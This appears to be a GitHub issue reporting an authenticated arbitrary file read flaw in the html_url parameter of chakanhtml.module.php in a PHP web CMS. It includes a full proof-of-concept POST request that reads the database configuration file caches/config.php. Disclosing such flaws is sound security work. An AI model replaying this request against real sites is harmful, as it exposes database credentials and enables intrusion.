Hello, I found that there is a Arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file on the website. The html_url parameter is not filtered for dangerous characters, resulting in a vulnerability.This vulnerability requires logging in to the background.
Read the database configuration file through the vulnerability
Hello, I found that there is a Arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file on the website. The html_url parameter is not filtered for dangerous characters, resulting in a vulnerability.This vulnerability requires logging in to the background.

Read the database configuration file through the vulnerability


poc:
POST /index.php?m=admin&allow=VsexFwGXtxWFB9EypPDSLC7g-&vs=5&c=chakanhtml&a=index HTTP/1.1
Host: kuaifan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
Referer: http://kuaifan.com/index.php?m=admin&allow=VsexFwGXtxWFB9EypPDSLC7g-&vs=5&c=chakanhtml
Cookie: PHPSESSID=93tspfs5s9e6dog3245nkiq3d7; backhttp[0]=http%3A%2F%2Fkuaifan.com%2Findex.php%3Fm%3Dadmin%26allow%3DVsexFwGXtxWFB9EypPDSLC7g-%26c%3Dchakanhtml; backhttp[1]=http%3A%2F%2Fkuaifan.com%2Findex.php%3Fm%3Dadmin%26allow%3DVsexFwGXtxWFB9EypPDSLC7g-%26c%3Dchakanhtml%26a%3Dindex; backhttp[2]=http%3A%2F%2Fkuaifan.com%2Findex.php%3Fm%3Dadmin%26allow%3DVsexFwGXtxWFB9EypPDSLC7g-%26c%3Dchakanhtml; UM_distinctid=1735aa0c7f16b6-00d9b452785a7a-12666d4a-144000-1735aa0c7f2581
Connection: close
Upgrade-Insecure-Requests: 1
html_url=caches%2Fconfig.php&html_view=0&html_head=0&dosubmit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E7%9C%8B
The text was updated successfully, but these errors were encountered: